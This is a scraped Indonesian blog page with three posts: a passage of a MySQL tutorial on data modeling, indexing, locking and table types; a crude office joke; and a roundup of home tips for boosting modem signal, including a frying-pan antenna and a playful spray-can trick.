45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt;">Modeling tentunya tidak bisa diajarkan dalam 1–2 hari, apalagi dalam artikel yang singkat ini. Anda perlu membaca buku-buku mengenai pemodelan database dan belajar dari pengalaman maupun dari model-model yang sudah ada. Tapi beberapa nasihat yang mungkin bisa saya berikan di sini adalah sbb.</div><div class="MsoNormal" style="tab-stops: 45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt;"><b>Satu</b>, langkah pertama dalam pemodelan adalah menemukan entiti-entiti. Entiti bisa dibilang “objek” yang akan kita gelluti. Misalnya, customer, produk, dan transaksi. Setiap entiti umumnya ditaruh dalam satu tabel, tabel ini disebut tabel entiti. Langkah kedua adalah mencari atribut-atribut entiti tersebut. Misalnya tabel customers memiliki atribut sapaan, nama, alamat (jalan + kota + kodepos + propinsi + negara), tanggal record ini ditambahkan, dsb. Langkah ketiga adalah mencari relasi di antara entiti-entiti. Umumnya relasi adalah satu dari: 1-1, 1-many, many-many. Misalnya, relasi antara transaksi dan produk adalah many-many, artinya sebuah transaksi pembelian dapat berisi banyak produk dan sebuah produk tentu saja dapat dibeli dalam lebih dari satu transaksi. Setiap relasi juga akan ditempatkan pada tabel, yaitu tabel relasi.</div><div class="MsoNormal" style="tab-stops: 45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt;"><b>Dua</b>, dalam pemodelan tidak ada istilah model yang benar atau salah. Yang ada adalah model yang tepat dan tidak tepat untuk keperluan tertentu. Misalnya, untuk aplikasi sederhana modelnya sederhana. Semakin kompleks aplikasi, model pun semakin rumit (jumlah entiti, relasi, dan atribut akan bertambah). Pada umumnya, seiring kompleksitas bertambah, <i>yang tadinya atribut akan berubah menjadi entiti</i> dikarenakan adanya kenyataan hubungan 1-many/many-many antara atribut. Contohnya, tabel customers memiliki atribut alamat. Jika kita ingin mendukung banyak alamat untuk satu customers, maka alamat akan menjadi entiti dan menempati tabel sendiri. Lalu kita membuat tabel relasi customers-alamat.</div><a href="http://buang9.blogspot.com/2011/05/8-hal-yang-harus-diketahui-programer.html" name="sub6"></a><h2>6. Indeks</h2><div class="Normal-first" style="tab-stops: 45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt;">Indeks adalah sesuatu yang berkaitan erat dengan implementasi, bukan modeling. Kita seringkali perlu menambahkan indeks pada sebuah field atau banyak field dikarenakan jika tidak ditambahkan maka performance database tidak menjadi praktis. Serba-serbi indexing juga mungkin terlalu panjang untuk bisa dijelaskan dalam artikel pendek ini, tapi intinya setiap kolom yang: 1) memiliki rentang nilai cukup banyak; 2) terletak pada tabel yang berisi banyak record; 3) seringkali disebutkan di klausa <tt>WHERE</tt> dan/atau <tt>ORDER BY</tt> dan/atau <tt>GROUP BY</tt>; perlu diberi indeks. Ini dikarenakan <i>indeks membantu mencari secara cepat sebuah nilai dari banyak nilai yang ada. </i>Beberapa contoh:</div><div class="MsoNormal" style="tab-stops: 45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt;">* Setiap primary key umumnya otomatis diberi indeks oleh database server, meskipun tabelnya masih berisi sedikit record atau bahkan kosong. Ini dikarenakan database perlu selalu mengecek keberadaan sebuah nilai field ini manakala ada sebuah record yang ditambahkan (ingat, PK artinya tak boleh ada dua record yang mengandung nilai field ini yang sama). Tanpa indexing, pengecekan akan linear dan memakan waktu lama.</div><div class="MsoNormal" style="tab-stops: 45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt;">* Field tanggal lahir dalam tabel customers kemungkinan besar harus diindeks. Bahkan <tt>dayofyear()</tt> field ini juga mungkin perlu diindeks. Mengapa? Karena: 1) rentang nilai cukup besar (365 hari dalam setahun x +- 60 jumlah tahun); 2) tabel customers potensial ukurannya besar; 3) sering disebutkan di klausa <tt>WHERE</tt> (misalnya mencari customer yang ultah hari ini).</div><div class="MsoNormal" style="tab-stops: 45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt;">* Field memo/notes kemungkinan besar tidak perlu diindeks (secara biasa). Mengapa? Karena meskipun 1) rentang nilai cukup besar; dan 2) tabel customers bisa besar; tapi 3) field ini tidak pernah disebutkan di klausa <tt>WHERE</tt> secara langsung (mis: Anda tidak pernah menyebutkan: … <tt>WHERE notes='nilai catatan tertentu'</tt> atau <tt>WHERE notes > 'nilai tertentu'</tt>). [Catatan: ada indeks lain yang “tidak biasa” di MySQL, yaitu FULLTEXT. Tapi ini di luar cakupan artikel kita kali ini.]</div><div class="MsoNormal" style="tab-stops: 45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt;">* Field jenis kelamin mungkin tidak perlu diindeks, kecuali jika perbandingan pria:wanita amat drastis bedanya. Mengapa? Sebab: 1) rentang nilai yang ada hanyalah dua: L (lelaki) dan P (perempuan). Meskipun Anda beri indeks, tidak akan memperbaiki kinerja.</div><a href="http://buang9.blogspot.com/2011/05/8-hal-yang-harus-diketahui-programer.html" name="sub7"></a><h2>7. Konkurensi, Locking, dan Transaksi</h2><div class="Normal-first" style="tab-stops: 45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt;">Programer web pemula kadang-kadang tidak menyadari bahwa program/skrip yang dibuatnya tidaklah seperti program desktop yang dijalankan oleh satu user. Melainkan, dalam satu waktu bisa saja ada 10 atau 100 user yang “menembak” skrip Anda di Web. Karena itu, isu locking dan konkurensi penting sekali. Contohnya adalah seperti ini:</div><pre style="color: blue;"><span style="background-color: #cccccc;">$res = mysql_query("SELECT value FROM counters WHERE name='counter1'");</span>
<span style="background-color: #cccccc;">list ($value) = mysql_fetch_row($res);</span>
<span style="background-color: #cccccc;">$value++;</span>
<span style="background-color: #cccccc;">// do something else first...</span>
$res = mysql_query("UPDATE counter SET value=$value WHERE name='counter1'");</pre><div class="MsoNormal" style="tab-stops: 45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt;">Di antara baris pertama (saat kita mengambil nilai record) dan baris keempat (saat kita menaruh kembali nilai dalam record) mungkin saja telah terjadi beberapa kali perubahan terhadap si record. Misalnya, pada baris pertama klien1 memperoleh nilai $value = 100. Di baris 3 <tt>$value</tt> di-increment menjadi 101. Tapi apa yang terjadi jika selama selang waktu itu nilai record counter1 telah menjadi 103 (karena misalnya klien2, klien3, dan klien4 telah meng-incrementnya)? Oleh si klien1, counter1 direset kembali menjadi 101 dan akibatnya increment oleh klien2, klien3, dan klien4 hilang. Seharusnya nilai counter1 menjadi 104.</div><div class="MsoNormal" style="tab-stops: 45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt;">Untuk kasus di atas, pemecahannya cukup gampang. Lakukan increment secara atomik:</div><div class="MsoNormal" style="background-color: #cccccc;"><br />
</div><span style="background-color: #cccccc;"> </span><pre style="background-color: #cccccc; color: blue;">// tidak perlu ambil nilai counter dulu...
// do something else first...
$res = mysql_query("UPDATE counter SET value=value+1 WHERE name='counter1'");</pre><pre style="color: blue;"> </pre><div class="MsoNormal" style="tab-stops: 45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt;">Tapi dalam kasus lain, kadang-kadang kita harus melakukan <i>locking</i> terhadap tabel atau record untuk menjamin bahwa selama kita <tt>// do something else…</tt> klien2, klien3, dan klien4 tidak bisa seenaknya menaikkan nilai counter:</div><div class="MsoNormal"><br />
</div><pre style="background-color: #cccccc; color: blue;"><b>mysql_query("LOCK TABLES cuonters");</b>
$res = mysql_query("SELECT value FROM counters WHERE name='counter1'");
list ($value) = mysql_fetch_row($res);
// do something else first... increase value or something...
$res = mysql_query("UPDATE counter SET value=$value WHERE name='counter1'");
<b>mysql_query("UNLOCK TABLES");</b></pre><pre style="color: blue;"><b> </b></pre><div class="MsoNormal" style="tab-stops: 45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt;">atau (lebih baik karena kita tidak perlu melock keseluruhan tabel):</div><div class="MsoNormal"><br />
</div><pre style="background-color: #cccccc; color: blue;"><b>mysql_query("SELECT GET_LOCK('lock1')");</b>
$res = mysql_query("SELECT value FROM counters WHERE name='counter1'");
list ($value) = mysql_fetch_row($res);
// do something else first... increase value or something...
$res = mysql_query("UPDATE counter SET value=$value WHERE name='counter1'");
<b>mysql_query("SELECT RELEASE_LOCK('lock1')");</b></pre><div class="MsoNormal" style="tab-stops: 45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt;"><br />
</div><div class="MsoNormal">Ingat, locking dapat berakibat samping yaitu deadlock.</div><div class="MsoNormal" style="tab-stops: 45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt;"><b>Transaksi. </b>Transaksi pun sesuatu yang dipergunakan secara meluas di dunia database, tapi hampir tidak pernah kita jumpai di bahasa pemrograman (ini karena data di bahasa pemrograman ditaruh dalam variabel di memori semua; tidak ada isu disk yang crash/lambat/rusak/harus disinkronkan dengan data di memori). Karena itu Anda perlu memahami konsep ini dari buku-buku tentang database.</div><a href="http://buang9.blogspot.com/2011/05/8-hal-yang-harus-diketahui-programer.html" name="sub8"></a><h2>8. Jenis Tabel</h2><div class="Normal-first" style="tab-stops: 36.0pt;">Di MySQL dikenal istilah table handler dan jenis tabel. Saat ini ada 3 jenis tabel utama yang bisa dipakai di MySQL: MyISAM (default), BerkeleyDB, dan InnoDB. Yang perlu diketahui ada tiga hal: 1) tidak semua tabel mendukung transaksi (MyISAM tidak mendukung transaksi, jadi COMMIT dan ROLLBACK tidak melakukan sesuatu yang semestinya jika Anda menerapkan pada tabel MyISAM); 2) tidak semua tabel punya karakteristik performance yang sama (BerkeleyDB misalnya, lambat jika ukuran tabel besar) dan disimpan dengan cara yang sama (tabel MyISAM misalnya disimpan dalam 3 file: .MYI, .MYD, .frm sementara tabel-tabel dan database-database InnoDB disimpan bersama dalam daerah disk yang disebut tablespace; 3) distribusi MySQL yang bukan -Max tidak dikompile dengan dukungan terhadap BerkeleyDB dan InnoDB.</div><div class="MsoNormal" style="tab-stops: 36.0pt;">Nomor 3 penting Anda ketahui karena jika kita menginstruksikan MySQL untuk membuat database dengan jenis tertentu:</div><pre>CREATE TABLE (...) TYPE=BDB;</pre><div class="MsoNormal" style="tab-stops: 36.0pt;">Dan MySQL tidak dikompile untuk mendukung BerkeleyDB, maka MySQL <i>tidak</i> akan protes dengan error, melainkan membuatkan tabel tersebut untuk kita <i>tapi dengan tipe default</i> yaitu MyISAM. Jadi Anda perlu mengecek dulu menggunakan <tt>SHOW TABLE STATUS</tt>:</div><pre>mysql> <samp>create table t4 (i int) type=innodb;</samp>
Query OK, 0 rows affected (0.00 sec)
<span style="background-color: #cccccc; color: blue;">mysql> </span><samp style="background-color: #cccccc; color: blue;">show table status from mydb like 't4';</samp>
<span style="background-color: #999999; color: blue;">+------+--------+-...</span>
<span style="background-color: #999999; color: blue;">| Name | Type | ...</span>
<span style="background-color: #999999; color: blue;">+------+--------+-...</span>
<span style="background-color: #999999; color: blue;">| t4 | MyISAM | ...</span>
<span style="background-color: #999999; color: blue;">+------+--------+-...</span></pre><span style="background-color: white;"> </span><div class="MsoNormal" style="background-color: white;">Ternyata MyISAM!</div><a href="http://buang9.blogspot.com/2011/05/8-hal-yang-harus-diketahui-programer.html" name="sub9"></a><h2>Penutup</h2><div class="Normal-first" style="tab-stops: 36.0pt;">Sebetulnya untuk memakai MySQL dengan baik dan benar diperlukan skill-skill dasar lain seperti membackup, merestore, mengeset parameter-parameter server, memonitor server, dsb. Tapi itu semua lebih merupakan tugas seorang administrator (DBA).</div></div>ichankalberthttp://www.blogger.com/profile/10799786532003158075noreply@blogger.com0tag:blogger.com,1999:blog-1756550600588610983.post-19969714964839623652011-05-23T02:52:00.002+07:002011-05-23T02:52:38.031+07:00AN INTERESTING OBSERVATION<div dir="ltr" style="text-align: left;" trbidi="on"><a href="http://indonesia-blogger.com/"><img border="0" src="http://www.indonesia-blogger.com/img/indonesiablogger.jpg" /><span style="font-size: small;">AN INTERESTING OBSERVATION<br />
<br />
1. The sport of choice for the urban poor is BASKETBALL.<br />
<br />
2 The sport of choice for maintenance level employees is BOWLING.<br />
<br />
3 The sport of choice for front-line workers is FOOTBALL.<br />
<br />
4 The sport of choice for supervisors is BASEBALL.<br />
<br />
5 The sport of choice for middle management is TENNIS.<br />
<br />
And....<br />
<br />
6 The sport of choice for corporate executives and officers is GOLF.<br />
<br />
THE AMAZING CONCLUSION:<br />
<br />
The higher you go in the corporate structure, the smaller your balls become.<br />
<br />
There must be a ton of people in Washington playing marbles!</span><br />
</a><br />
<div align="left"><div id="yiv623346282"><div><div id="yiv623346282"><span style="font-size: xx-small;"><span style="font-size: x-small;"><div><span style="font-size: small;">Tattoo Gypsy</span></div></span></span><div><span style="font-size: xx-small;"><span style="font-size: x-small;"><span style="font-size: small;"> </span></span></span><div id="yiv623346282"><span style="font-size: xx-small;"><span style="font-size: x-small;"> <div><span style="font-size: small;"><img alt="Image" src="http://whitetigerllc.com/spinEGAsilver.gif" /></span></div><span style="font-size: xx-small;"><span style="font-size: x-small;"><span style="font-size: small;"><span style="font-size: small;"><div> <div><a href="http://www.whitetigerllc.com/" rel="nofollow" target="_blank"><span style="color: #003399; font-size: small;">http://www.WhiteTigerLLC.com</span></a><span style="font-size: small;"> </span></div><div><span style="font-size: small;">and </span></div><div><a href="http://www.cafepress.com/whitetiger_llc" rel="nofollow" target="_blank"><span style="color: #003399; font-size: small;">http://www.cafepress.com/whitetiger_llc</span></a><span style="font-size: small;"> </span></div><div><span style="font-size: small;">and </span></div><div><a href="http://www.zazzle.com/whitetiger_llc" rel="nofollow" target="_blank"><span style="color: #003399; font-size: small;">http://www.zazzle.com/whitetiger_llc</span></a><span style="font-size: small;"> </span></div><div><span style="font-size: small;"> </span><div><span style="font-size: small;"><span style="font-size: small;">and </span></span></div><span style="font-size: small;"> </span><div><span style="font-size: small;"><a href="http://www.cafepress.com/Big_Government" rel="nofollow" target="_blank">http://www.cafepress.com/Big_Government </a><br />
and</span></div><span style="font-size: small;"> </span><div><div> <div><span style="font-size: small;"><a href="http://www.facebook.com/White.Tiger.LLC" rel="nofollow" target="_blank">http://www.facebook.com/White.Tiger.LLC</a> <br />
and <br />
<a href="http://www.zazzle.com/Tattoo_Time" rel="nofollow" target="_blank">http://www.zazzle.com/Tattoo_Time</a> </span></div></div></div></div></div></span></span></span></span></span></span></div></div></div></div></div></div></div>ichankalberthttp://www.blogger.com/profile/10799786532003158075noreply@blogger.com0tag:blogger.com,1999:blog-1756550600588610983.post-53994814928423809172011-05-22T08:46:00.000+07:002011-05-22T08:46:00.551+07:00Cara Memperkuat Sinyal<div dir="ltr" style="text-align: left;" trbidi="on"><a href="http://indonesia-blogger.com/"><img border="0" src="http://www.indonesia-blogger.com/img/indonesiablogger.jpg" /></a><br />
Karena banyak yang sinyalnya putus-putus, berikut Sharing Cara Memperkuat Sinyal Modem Cara Memperkuat Sinyal USB Cara Memperkuat Sinyal HP Cara Memperkuat Sinyal Blackberry Cara Memperkuat Sinyal iPhone Cara Meningkatkan Sinyal Modem Cara Meningkatkan Sinyal USB Cara Meningkatkan Sinyal HP Cara Meningkatkan Sinyal Blackberry, Cara Meningkatkan Sinyal iPhone Cara Menambah Sinyal Modem, Cara Menambah Sinyal USB Cara Menambah Sinyal HP Cara Menambah Sinyal Blackberry Cara Menambah Sinyal iPhone, Cara Memperkuat Sinyal IM2, Cara Memperkuat Sinyal Indosat, Cara Memperkuat Sinyal Telkomsel, Cara Memperkuat Sinyal Three, Cara Memperkuat Sinyal Smart, Cara Memperkuat Sinyal CDMA, Cara Memperkuat Sinyal GPRS, Cara Memperkuat Sinyal UMTS, Cara Memperkuat Sinyal HSDPA, Cara Memperkuat Sinyal Fren, Cara Menambah Sinyal IM2, Cara Menambah Sinyal Indosat, Cara Menambah Sinyal Telkomsel, Cara Menambah Sinyal Three, Cara Menambah Sinyal Smart, Cara Menambah Sinyal CDMA, Cara Menambah Sinyal GPRS, Cara Menambah Sinyal UMTS, Cara Menambah Sinyal HSDPA, Cara Menambah Sinyal Fren, Cara Menigkatkan Sinyal IM2, Cara Menigkatkan Sinyal Indosat, Cara Menigkatkan Sinyal Telkomsel, Cara Menigkatkan Sinyal Three, Cara Menigkatkan Sinyal Smart, Cara Menigkatkan Sinyal CDMA, Cara Menigkatkan Sinyal GPRS, Cara Menigkatkan Sinyal UMTS, Cara Menigkatkan Sinyal HSDPA, Cara Menigkatkan Sinyal Fren..<br />
<h2 style="text-align: center;">Option Pertama</h2><strong>Berinternet zaman sekarang untuk sebagian orang seolah-olah sudah menjadi kebutuhan pokok.</strong> Penyebabnya karena internet ini mempunyai banyak mamfaat positif. Mulai dari sekedar browsing, email-an, facbookan, twittreran, blogging atau untuk keperluan bisnis semua dilakukan di internet. Oleh karena itu rata-rata pengguna internet sekarang berpikiran untuk mempunyai koneksi internet pribadi. Langganan internet yang murah dan terjangkau yaitu menggunakan layanan telpon selular GSM/CDMA. Tarifnya cendrung murah apalagi untuk CDMA rata-rata hanya membutuhkan dana Rp.50.000,- per bulan unlimited.<br />
Oleh karena itu banyak diantara kita yang berlangganan internet ke provider dengan bantuan modem.<br />
Kendala yang sering dihadapi adalah lemahnya sinyal terutama bagi orang yang tinggal di pelosok desa seperti saya. Tapi jangan khawatir, dengan sedikit usaha dan kemauan untuk mencoba ada banyak sekali tehnik yang bisa digunakan untuk memperkuat sinyal modem baik itu cara yang ribet, mahal ataupun murah dan gampang.<br />
Cara yang saya gunakan adalah tergolong cara yang murah dan gampang tapi hasilnya insya Allah tidak murahan.<br />
Kalau kita browsing di internet kita akan menemui banyak cara yang patut kita hargai karena itu adalah hasil kreativitas dari sahabat-sahabat kita tapi banyak juga diantaranya yang tidak memberi hasil setelah dicoba.<br />
Model antena paling efektif pernah saya coba adalah wajan bolic. Tidak perlu membeli, kita dapat membuatnya sendiri dengan biaya yang tidak terlalu mahal bahkan bisa jadi GRATIS kalau ternyata alat bahannya sudah tersedia.<br />
<img alt="" class="aligncenter" height="315" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgFWVivOBIZKjb6oJufdnGehhTU7zSOBYceL7V_-I8AWDZaO9zQMlhQ82ze1bYr8FPIX99wGtTP_3upa8xEUyQs_SKZ5PsY8Vni9SaGJ_cmMRf1GpPXuyNnpD9a1iSxVd7PiVemGsNBS6Q/s1600/wajanku.jpg" title="Antena Wajan Bolic" width="236" /><br />
<strong>1. Alat dan bahan yang dibutuhkan untuk membuat Antena Wajan Bolic.</strong><br />
<ul><li>Wajan berdiameter minimal 45 cm</li>
<li>USB wirelles 11 MB + kabel</li>
<li>Kaleng berdiameter 10 cm dengan tinggi 15 cm</li>
<li>Sok drat luar dan dalam masing – masing (2 buah)</li>
<li>Paralon 0,5” inch</li>
<li>Bor</li>
<li>Mur Gergaji besi</li>
</ul><strong>2. Langkah – langkah pembuatan Wajan Bolic</strong><br />
<ul><li>Lubangi wajan tepat ditengah sesuai dengan ukuran baut yang digunakan sebagai penyangga.</li>
<li>Potong paralon setinggi kaleng ditambah jarak dasar wajan ke kaleng setinggi 5 cm. Dan belah sebagian paralon sebagai penjebit USB Wirelles.</li>
<li>Potong sok drat luar sehingga berbentuk seperti gambar berikut.</li>
<li>Lubangi bagian dasar kaleng pas di tengah sesuai ukuran mur. Dan sekaligus lubangi bagian samping kaleng sesuai ukuran USB wireless untuk menghubugkan kabel USB ke USB wireless.</li>
<li>Pasang USB pada paralon yang telah di belah. Dan ikuti dengan memasang sok drat luar. Seperti gambar berikut.</li>
<li>Masukkan USB yang telah dipasang pada paralon tadi kedalam kaleng dan pasang kabel USB melaui lubang pada bagian samping kaleng.</li>
<li>Pasang kaleng yang telah ada USB pada wajan</li>
</ul>Source: tenriewa[.]co[.]cc<br />
<h2 style="text-align: center;">Option Keduan</h2><strong>Tips memperkuat sinyal internet 3g hsdpa ampe dua bar. bagaimana ceritanya?</strong><br />
Sudah mau seminggu di palembang yang akhir akhir ini cuacanya amat panas.<br />
Sudah mau seminggu juga hatiku panas karena koneksi internet yang kayak siput.<br />
Sudah mau seminggu dapat sinyal bolak balik gprs.. bahkan edge.. <img alt=":(" src="http://www.ficomaulana.com/wp-includes/images/smilies/icon_sad.gif" /><br />
Sudah mau seminggu bermimpi dapat sinyal 3G atau HSDPA..<br />
Si kuning dicoba dapat sinyal EDGE.. paling bagus dapat GPRS<br />
Adiknya si kuning, rumah ku belum masuk coverage 3g …<br />
Si biru bawaan unlimited dari jakarta.. mayan.. jam 11 malam keatas dapat 3g 1 bar..Kalau pagi siang sore.. mentok di gprs..<br />
Si merah.. dapat sinyal 3g lumayan.. mau apply baru.. katanya unlimited fair usage cuma ampe 500 mb. (apa!! cuma 500 MB !#%^?) abis itu turun 64 kbps. <img alt=":(" src="http://www.ficomaulana.com/wp-includes/images/smilies/icon_sad.gif" /> ( Kayaknya untuk daku yang online dari bangun tidur sampe mau tidur (seperti lagu saykoji) Amat sangat tidak cocok.<br />
Ada juga yang fair usage 2GB. tapi 400 rb.bulan.. huadoh…<br />
Ya sudahlah.. akhirnya kuputuskan bertahan dengan koneksi si biru unlimited.. karena berdasarkan hasil uji coba.. alasan utama koneksi internet lemot di rumahku adalah karena lokasi yang berada diluar jangkauan hsdpa. dalam arti posisi rumah letaknya terlalu jauh dari BTS pemancar. Ini artinya daku harus berusaha agar modem mampu menangkap sinyal dengan lebih baik.<br />
Gogling dan browsing sana dan kemari.. mencari cara bagaimana menguatkan sinyal.. Ketemu beberapa alternatif cara. mulai dari beli antena untuk internet, buat antena sendiri pake wajan <img alt=":P" src="http://www.ficomaulana.com/wp-includes/images/smilies/icon_razz.gif" /> , buat antena bazooka dari pipa paralon.. atau sekedar ide tarok modem diatas genteng.. (hihi). Well.. dari kesemua ide tersebut.. yang paling menarik perhatian adalah cara yang daku gunakan saat ini. Percaya ngga percaya.. sinyal dari yang tadinya dapat GPRS.. sekarang dapat 3g 2 bar.. lumayan banget kan… freukensi juga dai 114 jadi 101 db..hehe.. ajib banget. Caranya mudah banget. Pasti bisa diterapkan bagi yang ingin nambah kekuatan sinyal.. Kabarnya cara ini sudah diuji di 5 jenis modem yang berbeda dan berhasil. Mau tau caranya? Silahkan disimak…<br />
<span style="color: red;"><em><strong>Pertama, </strong></em></span>siapkan kaleng obat nyamuk semprot. Bisa berbagai merk seperti H*T, B**g*n dan sebagainya. semakin besar semakin baik. oya, yang kaleng ya.. bukan yang plastik. isi atau kosong ngga masalah.<br />
<span style="color: red;"><strong>Kedua, </strong></span>siapkan keping cakram dvd atau vcd. apa saja. baik yang bekas atau yang baru. yang penting ada bagian cakram yang mengkilap sebagaimana keping vcd/dvd.<br />
<span style="color: navy;"><strong>Cara pakainya amat sangat gampang:</strong></span><br />
<ul><li>Nyalakan komputer dan koneksikan modem anda seperti biasa.</li>
<li>Lalu dekatkan kaleng obat semprot nyamuk di modem anda. tidak perlu bersentuhan. cukup berdekatan saja.</li>
<li>Letakkan cakram dvd dibawah modem. bagian mengkilat mengarah ke atas.</li>
</ul>Sudah. silahkan internetan.. (haa.. gitu aja) yaa.. bgitu saja.<br />
Tadaaaa…. rasakan peningkatan sinyal internet anda.<br />
Awalnya daku juga tidak percaya. Karena penasaran daku coba aja.<br />
eh bener lho.. sinyalnya jadi naek 2 bar. dan cukup stabil. ngga naek turun lagi.<br />
alhasil internetan pun jadi lancar. modem daku sierra881.<br />
Sebagai contoh berikut daku kasih screenshoot cara pakainya..<br />
<div style="text-align: center;"><a href="http://www.ficomaulana.com/wp-content/uploads/2009/09/Photo0007.jpg"><img alt="Photo0007" class="aligncenter" height="336" src="http://www.ficomaulana.com/wp-content/uploads/2009/09/Photo0007-300x225.jpg" title="Photo0007" width="449" /></a></div>Huehue..<br />
Percaya ngga percaya.. silahkan dicoba…<br />
Oya, kalau mau sinyalnya naek 4 bar.. silahkan ganti kaleng obat nyamuk semprot dengan Drum minyak tanah hehe.=))<br />
Selamat mencoba. <img alt=":P" src="http://www.ficomaulana.com/wp-includes/images/smilies/icon_razz.gif" /><br />
nb. informasi dari kaskus.u [f.i.c.o.m.a.u.l.a.n.a.[.].c.o.m]<br />
<h2 style="text-align: center;">Option Ketiga</h2><div><img alt="" border="0" class="aligncenter" src="http://darmawanku.files.wordpress.com/2009/03/wajan.jpg" /></div><div>Penguat <strong>Sinyal GPRS </strong>atau <strong>Sinyal 3G </strong>pada<strong> </strong>modem atau wireless LAN bagi para pengguna internet yang memakai layanan WireLess mungkin sudah tidak asing lagi. Karena tentunya ada sebagian yang mengalami penangkapan sinyal wireless LAN atau GSM Modem baik Sinyal GPRS atau Sinyal 3G yang kurang kuat. Saya menganggap penangkapan sinyal 1/5 s/d 2/5 bar pada sinyal strength adalah kurang kuat mengingat pengalaman membuktikan bahwa dengan strength 1/5 s/d 2/5 bar koneksi internet sering terputus-putus.</div><div>Kita bisa melihatnya pada indikator icon dekstop di pojok kanan bawah…. coba lihat ada gambar komputer kecil di dekat bar-meter yang kadang menyala saat kita browsing internet, download ataupun upload….. cobalah lakukan browsing atau download,…. amati indikator tersebut dan reaksi display download,….. Disitu Anda akan melihat bahwa proses browsing, download dan upload akan sangat tergantung pada kondisi indikator tersebut,… <strong>Nah untuk mengatasi hal tersebut perlu dilakukan cara menguatkan sinyal wireless dan GSM modem baik Sinyal GPRS maupun Sinyal 3G.</strong></div><div>Biasanya untuk penangkapan sinyal yang hanya 1/5 bar atau 2/5 bar akan mengakibatkan indikator sering mati,.. dan pada saat itu proses browsing ataupun download akan berhenti,… Pada saat itu yang terjadi adalah Modem/wireless melakukan tracking ulang IP…. hal itu dikarenakan kurang kuatnya sinyal tangkapan dari BTS atau Hotspot,…. Nah,.. untuk itu berikut Tip aman untuk menguatkan sinyal GSM Modem baik itu Sinyal GPRS, Sinyal 3G ataupun Sinyal Wireless LAN</div><div>Ada 3 cara untuk <strong>Menguatkan Sinyal GSM</strong> Modem dan Wireless LAN yaitu :</div><ol><li><strong>Menggunakan Antena Luar</strong>, dengan menggunakan sistem induksi dimana kabel dari antena yang menuju ke Device (Modem/Wireless-LAN) tidak terhubung secara langsung dengan Device, melainkan pada ujung kabel dipasang semacam kumparan induksi/lilitan kawat berdiameter 1mm dengan diameter kumparan kira2 5cm (biasanya terbuat dari kawat berisolasi). Selanjutnya Device dimasukkan kedalam kumparan tadi. Dengan demikian diharapkan induksi elektromagnetik dari sinyal yang diterima dari antena menuju Device dan sebaliknya. Cara ini kurang efektif dan kurang aman untuk Menguatkan Sinyal GPRS atau Sinyal 3G ataupun wireless LAN,…. <strong>kenapa,.?…</strong> karena dengan induksi, energi sinyal dari modem atau sebaliknya dari antena-kabel-ke modem tidak semuanya tercover alias banyak energi yang hilang/Losses. Memang cara ini bisa menaikkan sinyal hingga 2 bar,. saya pernah mencoba bisa naik dari 2 bar menjadi 4 bar bahkan kadang2 full bar,.. Tetapi ternyata saat dilakukan browsing internet, download dan upload data sinyal sering nggak konek dan sering drop bahkan modem internet menjadi cepat panas…. Apa penyebabnya..? hal itu disebabkan energi sinyal modem banyak yang hilang dalam kumparan/hanya sedikit yang menginduksi,… selain itu cepat panasnya Device disebabkan terjadi VSWR yang tinggi pada modem akibat adanya benda logam/kumparan yang menyelubungi antena internal Device tersebut…. kalau ini dibiarkan berlama-lama,… Device bisa rusak pada bagian Power RF nya ….</li>
